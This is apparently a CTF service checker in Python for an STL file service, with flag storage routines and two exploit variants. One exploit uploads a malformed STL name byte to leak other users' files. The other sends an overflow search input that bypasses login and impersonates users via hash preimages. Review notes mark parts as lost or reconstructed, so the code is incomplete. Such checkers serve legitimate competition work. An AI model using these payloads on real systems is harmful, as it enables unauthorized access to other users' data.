#!/usr/bin/env python3
"""Checker for the "stldoctor" service, built on enochecker.

The checker uploads randomly generated STL models (ASCII and binary), stores
flags in the solid name of such models, retrieves them again, and contains
two exploit routines.

NOTE(review): the copy of this file that was reviewed had lost a span of
text between the ``struct.pack(`` call in ``genfile_bin`` and the body of
``putflag``.  The places affected are marked with ``NOTE(review)`` comments
below and must be restored from version control before this module is used.
"""

from enochecker import BaseChecker, BrokenServiceException, EnoException, run
from enochecker.utils import SimpleSocket, assert_equals, assert_in

import logging
import os
import random
import selectors
import socket
import string
import struct
import subprocess
import time

import numpy as np

# Quieten chatty third-party loggers before faker is imported.
logging.getLogger("faker").setLevel(logging.WARNING)
logging.getLogger("pwnlib").setLevel(logging.WARNING)
logging.getLogger("_curses").setLevel(logging.CRITICAL)

from faker import Faker

# ASCII STL whose solid name ends in a raw 0xff byte; uploaded by the first
# exploit variant.
# NOTE(review): the reviewed copy had every line break collapsed to a space.
# The breaks below follow the one-statement-per-line layout that
# genfile_ascii() emits -- confirm against the original literal.
evil_file = b"""
solid test\xff
facet normal 0 0 1.0
outer loop
vertex 1 0 0
vertex 1 1 0
vertex 0 1 0
endloop
endfacet
endsolid
"""


def ensure_bytes(v):
    """Return *v* as ``bytes``.

    ``bytes`` values are returned unchanged and ``str`` values are encoded
    with the default codec.

    Raises:
        BrokenServiceException: if *v* is neither ``str`` nor ``bytes``.
    """
    if isinstance(v, bytes):
        return v
    if isinstance(v, str):
        return v.encode()
    raise BrokenServiceException("Tried to pass non str/bytes to bytes arg")


class STLDoctorChecker(BaseChecker):
    """enochecker implementation for the stldoctor service."""

    service_name = "stldoctor"
    port = 9090

    flag_variants = 2
    noise_variants = 2
    havoc_variants = 4
    exploit_variants = 2

    # Prompt the service prints when it is ready for the next command.
    prompt = b"$ "

    # Characters fakeid() may emit.  The previous hand-typed alphabet was
    # missing the lowercase "n"; building it from the string constants
    # avoids that class of typo.
    _ID_CHARS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "-+.!"

    def login_user(self, conn, password):
        """Send a ``login`` command with *password* and expect "logged in!"."""
        self.debug("Sending command to login.")
        conn.write(f"login\n{password}\n")
        conn.readline_expect(
            b"logged in!",
            recvuntil=self.prompt,
            exception_message="Failed to log in",
        )

    def write(self, conn, buf):
        """Log *buf* and send it over *conn* as bytes."""
        payload = ensure_bytes(buf)
        self.debug("SEND: " + str(payload))
        conn.send(payload)

    def fakeid(self):
        """Return a name-like identifier made only of ``_ID_CHARS``.

        A Faker-generated name is stripped of spaces and disallowed
        characters, cut to at most 60 characters, right-padded with "." to
        at least 10, and suffixed with 5 random allowed characters.
        """
        fake = Faker(["en_US"])
        allowed = self._ID_CHARS
        name_chars = [c for c in fake.name().replace(" ", "") if c in allowed]
        idstr = "".join(name_chars[:60]).ljust(10, ".")
        idstr += "".join(random.choice(allowed) for _ in range(5))
        return idstr

    def havocid(self):
        """Return 10-60 random characters with code points 32..127 inclusive.

        The upper bound is inclusive, so the result may contain DEL (0x7f).
        """
        idlen = random.randint(10, 60)
        return "".join(chr(random.randint(32, 127)) for _ in range(idlen))

    def do_auth(self, conn, authstr):
        """Send ``auth <authstr>`` and require "Success!" in the reply.

        Raises whatever ``assert_in`` raises when the marker is missing.
        """
        conn.write(f"auth {authstr}\n")
        resp = conn.recvuntil(self.prompt)
        authstr = ensure_bytes(authstr)
        assert_in(b"Success!", resp, f"Login with pass {authstr} failed")

    def check_listed(self, conn, modelid):
        """Send ``list`` and require *modelid* to appear in the reply."""
        modelid = ensure_bytes(modelid)
        conn.write("list\n")
        resp = conn.recvuntil(self.prompt)
        assert_in(modelid, resp, "Uploaded model is missing from list command")

    def genfile_ascii(self, solidname):
        """Build a random ASCII STL document named *solidname*.

        The document has between 4 and 30 facets.  Each facet consists of
        three random vertices in the unit cube and their normalised cross
        product as the facet normal, all printed with two decimals.  An
        empty *solidname* yields bare ``solid`` / ``endsolid`` lines.
        """
        solidname = ensure_bytes(solidname)
        named = len(solidname) != 0

        lines = [b"solid " + solidname if named else b"solid"]
        facet_count = random.randint(4, 30)
        for _ in range(facet_count):
            vs = [[random.random() for _ in range(3)] for _ in range(3)]
            norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
            norm = norm / np.linalg.norm(norm)
            lines.append(b"facet normal " + " ".join(f"{v:.2f}" for v in norm).encode())
            lines.append(b"outer loop")
            for vertex in vs:
                lines.append(b"vertex " + " ".join(f"{v:.2f}" for v in vertex).encode())
            lines.append(b"endloop")
            lines.append(b"endfacet")
        lines.append(b"endsolid " + solidname if named else b"endsolid")

        # Every line, including the last, is newline-terminated.
        return b"\n".join(lines) + b"\n"

    def genfile_bin(self, solidname):
        """Build a random binary STL document carrying *solidname* in its header.

        The 80-byte header is ``#`` followed by *solidname* padded with NUL
        bytes.  Between 4 and 30 facets are generated.

        Raises:
            EnoException: if *solidname* is longer than 78 bytes.
        """
        solidname = ensure_bytes(solidname)
        if len(solidname) > 78:
            raise EnoException("Solidname to embed in header is larger than header itself")

        # The original compared the bytes value against the str "" (always
        # unequal) before padding; padding an empty name produces the same
        # all-NUL header, so a single expression covers both cases.
        header = b"#" + solidname.ljust(78, b"\x00") + b"\x00"

        facet_count = random.randint(4, 30)

        # NOTE(review): everything in this method after the opening of the
        # struct.pack( call was missing from the reviewed copy.  The rest is
        # reconstructed from the standard binary STL layout (little-endian
        # uint32 facet count, then per facet 12 float32 values and a uint16
        # attribute count) and from the facet generation in genfile_ascii().
        # Confirm against the original before relying on it.
        parts = [header, struct.pack("<I", facet_count)]
        for _ in range(facet_count):
            vs = [[random.random() for _ in range(3)] for _ in range(3)]
            norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
            norm = norm / np.linalg.norm(norm)
            parts.append(struct.pack("<3f", *norm))
            for vertex in vs:
                parts.append(struct.pack("<3f", *vertex))
            parts.append(struct.pack("<H", 0))
        return b"".join(parts)

    # NOTE(review): the reviewed copy contained no text between genfile_bin
    # and the body of putflag.  The methods below call openconn, closeconn,
    # putfile, getfile, check_getfile, havoc_upload, querydb, postdb,
    # reverse_hash and search_flag_bytes; none of them is defined in the
    # visible part of this file.  Any that are not inherited from
    # BaseChecker were presumably defined here and must be restored.

    # NOTE(review): the "def putflag" line itself was lost as well; it is
    # reconstructed from the surviving "None" annotation tail and the
    # signatures of getflag/putnoise/getnoise.
    def putflag(self):  # type: () -> None
        """Store ``self.flag`` as the solid name of a freshly uploaded model.

        Variant 0 uploads an ASCII model without authenticating; variant 1
        authenticates with a random auth string and uploads a binary model.
        The identifiers needed for retrieval are saved with ``postdb``.
        """
        if self.variant_id == 0:
            conn = self.openconn()
            modelname = self.fakeid()
            stlfile, modelid = self.putfile(conn, modelname, self.flag, filetype="ascii")
            self.closeconn(conn)
            self.postdb({"modelid": modelid, "modelname": modelname})
        elif self.variant_id == 1:
            conn = self.openconn()
            modelname = self.fakeid()
            authstr = self.fakeid()
            self.do_auth(conn, authstr)
            stlfile, modelid = self.putfile(conn, modelname, self.flag, filetype="bin")
            self.closeconn(conn)
            self.postdb({"modelid": modelid, "modelname": modelname, "auth": authstr})
        else:
            raise EnoException("Invalid variant_id provided")

    def getflag(self):  # type: () -> None
        """Fetch the model stored by putflag and require the flag in the reply."""
        if self.variant_id == 0:
            modelid, modelname = self.querydb("modelid", "modelname")
            conn = self.openconn()
            resp = self.getfile(conn, modelname.encode())
            self.debug(resp)
            assert_in(self.flag.encode(), resp, "Resulting flag was found to be incorrect")
            self.closeconn(conn)
        elif self.variant_id == 1:
            modelid, modelname, authstr = self.querydb("modelid", "modelname", "auth")
            conn = self.openconn()
            self.do_auth(conn, authstr)
            resp = self.getfile(conn, modelname.encode())
            assert_in(self.flag.encode(), resp, "Resulting flag was found to be incorrect")
            self.closeconn(conn)
        else:
            raise EnoException("Invalid variant_id provided")

    def putnoise(self):  # type: () -> None
        """Upload a random model and remember everything needed to re-check it.

        Variant 0 uploads a binary model without authenticating; variant 1
        authenticates first and uploads an ASCII model.
        """
        if self.variant_id == 0:
            conn = self.openconn()
            modelname = self.fakeid()
            solidname = self.fakeid()
            contents, modelid = self.putfile(conn, modelname, solidname, "bin")
            self.closeconn(conn)
            self.postdb({
                "modelid": modelid,
                "modelname": modelname,
                "solidname": solidname,
                "contents": contents,
            })
        elif self.variant_id == 1:
            conn = self.openconn()
            authstr = self.fakeid()
            modelname = self.fakeid()
            solidname = self.fakeid()
            self.do_auth(conn, authstr)
            contents, modelid = self.putfile(conn, modelname, solidname, "ascii")
            self.closeconn(conn)
            self.postdb({
                "modelid": modelid,
                "modelname": modelname,
                "solidname": solidname,
                "contents": contents,
                "auth": authstr,
            })
        else:
            raise EnoException("Invalid variant_id provided")

    def getnoise(self):  # type: () -> None
        """Re-check the model stored by putnoise via ``check_getfile``."""
        if self.variant_id == 0:
            modelid, modelname, solidname, contents = self.querydb(
                "modelid", "modelname", "solidname", "contents"
            )
            conn = self.openconn()
            self.check_getfile(conn, modelname, solidname, contents, modelid)
            self.closeconn(conn)
        elif self.variant_id == 1:
            modelid, modelname, solidname, contents, authstr = self.querydb(
                "modelid", "modelname", "solidname", "contents", "auth"
            )
            conn = self.openconn()
            self.do_auth(conn, authstr)
            self.check_getfile(conn, modelname, solidname, contents, modelid)
            self.closeconn(conn)
        else:
            raise EnoException("Invalid variant_id provided")

    def havoc(self):  # type: () -> None
        """Run ``havoc_upload`` with the arguments selected by the variant."""
        # variant_id -> (file type, second positional argument of havoc_upload)
        upload_args = {
            0: ("ascii", False),
            1: ("bin", False),
            2: ("ascii", True),
            3: ("bin", True),
        }
        args = upload_args.get(self.variant_id)
        if args is None:
            raise EnoException("Invalid variant_id provided")
        self.havoc_upload(*args)

    def exploit(self):  # type: () -> None
        """Run the exploit selected by ``variant_id`` and return the flag found.

        Raises:
            BrokenServiceException: if the exploit does not yield a flag.
            EnoException: for an unknown variant.
        """
        if self.variant_id == 0:
            return self._exploit_flagstore1()
        if self.variant_id == 1:
            return self._exploit_flagstore2()
        raise EnoException("Invalid variant_id provided")

    def _exploit_flagstore1(self):
        """Upload ``evil_file``, then download every entry "search last" lists."""
        name = self.fakeid()
        conn = self.openconn()
        _, mid = self.putfile(conn, name, name, stlfile=evil_file)
        self.debug(f"Evil file: {mid}")
        self.closeconn(conn)

        conn = self.openconn()
        resp = self.getfile(conn, name, download=False)
        self.debug(str(resp))
        conn.write("search last\n")
        listing = conn.recvuntil("?")
        # Result rows are recognised by the " : " separator between fields.
        filelist = [
            line.strip().split(b" : ")
            for line in listing.split(b"\n")
            if b" : " in line
        ]

        found = None
        last_index = len(filelist) - 1
        for index, entry in enumerate(filelist):
            self.debug(b"Retrieving file " + entry[0] + b": " + entry[1])
            conn.write(entry[0] + b"\ny\n")
            fileinfo = conn.recvuntil(self.prompt)
            self.debug("File contents:\n" + fileinfo.decode("latin1"))
            found = self.search_flag_bytes(fileinfo)
            if found is not None or index == last_index:
                break
            # Re-issue the search so the next entry can be selected.
            self.getfile(conn, name, download=False)
            conn.write("search last\n")
            conn.recvuntil("?")
        self.closeconn(conn)

        if found is None:
            raise BrokenServiceException("Exploit for flagstore 1 failed")
        return found

    def _exploit_flagstore2(self):
        """Overflow via ``search``, list user ids, then log in as each user."""
        conn = self.openconn()
        conn.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
        conn.recvuntil(self.prompt)
        conn.write("auth\n")
        assert_in(
            b"Already logged in!",
            conn.recvuntil(self.prompt),
            "Exploit did not set 'loggedin' variable via overflow",
        )
        conn.write("list\n")
        resp = conn.recvuntil(self.prompt)
        self.debug(resp)
        users = [line.split(b" .")[1] for line in resp.split(b"\n") if b">> ." in line]
        self.closeconn(conn)

        conn = self.openconn()
        found = None
        for u in users:
            self.debug(f"Logging in as user with id {u}")
            user = self.reverse_hash(u.decode())
            if user == b"":
                raise BrokenServiceException("Failed to find hash preimage")
            self.debug(f"Hash preimage: {user}")
            conn.write(b"auth " + user + b"\n")
            resp = conn.recvuntil(self.prompt)
            self.debug(resp)
            if b"Welcome back" not in resp:
                raise BrokenServiceException("Revhash returned invalid preimage")
            conn.write("list\n")
            resp = conn.recvuntil(self.prompt)
            self.debug(resp)
            names = b"\n".join(
                line.split(b": ", 1)[1]
                for line in resp.split(b"\n")
                if b"Solid Name: " in line
            )
            found = self.search_flag_bytes(names)
            if found is not None:
                break
        self.closeconn(conn)

        if found is None:
            raise BrokenServiceException("Exploit for flagstore 2 failed")
        return found


app = STLDoctorChecker.service  # This can be used for uWSGI.

if __name__ == "__main__":
    run(STLDoctorChecker)